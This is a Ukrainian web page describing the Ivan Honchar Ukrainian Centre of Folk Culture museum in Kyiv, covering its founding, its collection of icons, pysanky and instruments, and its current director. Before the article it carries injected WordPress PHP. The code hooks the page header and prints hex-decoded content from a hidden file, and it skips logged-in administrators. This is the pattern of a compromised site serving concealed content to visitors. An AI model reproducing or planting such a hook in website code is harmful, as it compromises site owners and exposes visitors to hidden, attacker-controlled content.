if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Музей Український центр народної культури

Музей Український центр народної культури

Український центр народної культури імені Івана Гончара було відкрито в Києві у 1999 році. Основою музею стала особиста колекція Івана Гончара – художника, скульптора та громадського діяча. Свою колекцію Іван Гончар почав збирати наприкінці 1950- х років. З поїздок по Україні художник привозив предмети народного мистецтва, виготовлені в різний час, що відбивають різноманіття культурних традицій країни. За кілька десятиліть грандіозної й кропіткої збірної та народознавчої роботи, Гончар зібрав унікальну колекцію, що поклала початок Українському центру народної творчості ім. Івана Гончара.

У той час, коли державні музеї наголошували на досягненнях культури радянського періоду, Іван Гончар не акцентував увагу на ідеологічних нюансах творчості. Він був зацікавлений у тому, щоб його колекція відбивала традиції української народної творчості. У результаті, цей суспільний музей набув популярності не тільки в Україні, але й за кордоном, а також став одним із центрів руху шестидесятників у Києві.

Як це часто буває, мрія Івана Гончара про музей здійснилася тільки в 1993 році, після його смерті. У вересні 1993 року адміністрація Києва виділила музею приміщення, а в 1999 році указом президента на основі Державного музею ім. Івана Гончара був відкритий Український центр народної культури.

Зібрання музею нараховує близько 15 000 предметів народної творчості, що мають художню й етнографічну цінність. У колекції музею ім. Івана Гончара широко представлений народний живопис, а також іконопис, текстильні вироби, кераміка, народні музичні інструменти (бандури, кобзи, цимбалы, колісна ліра). Унікальна колекція писанок складається з 500 одиниць. Меморіальний відділ зберігає матеріали про засновника музею І.М. Гончара. Зараз директором музею є син Івана Гончара – Петро Гончар, який не тільки успадкував від батька художній талант, але й перейняв у нього пристрасть до колекціонування ікон. Зусиллями Петра Гончара музейні кількість стародавніх іконописних образів перевищила 1 000 одиниць.

Український центр народної культури Музей Івана Гончара є державним всеукраїнським спеціалізованим науково-дослідним і культосвітнім інститутом. Основне завдання Українського центру народної культури – це збереження й відродження народної української культури й традицій. У музеї Івана Гончара постійно ведеться робота над поповненням колекції, підтримуються зв’язки із сучасними народними вмільцями, які є носіями секретів майстерності, проходять тематичні вечори, конференції, зберігається традиція польових експедицій.

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Статистика сторінки:
Переглядів сьогодні:
Переглядів у поточному місяці:
Відповідальність за зміст коментарів, що залишають відвідувачі, несуть їхні автори.
Популярне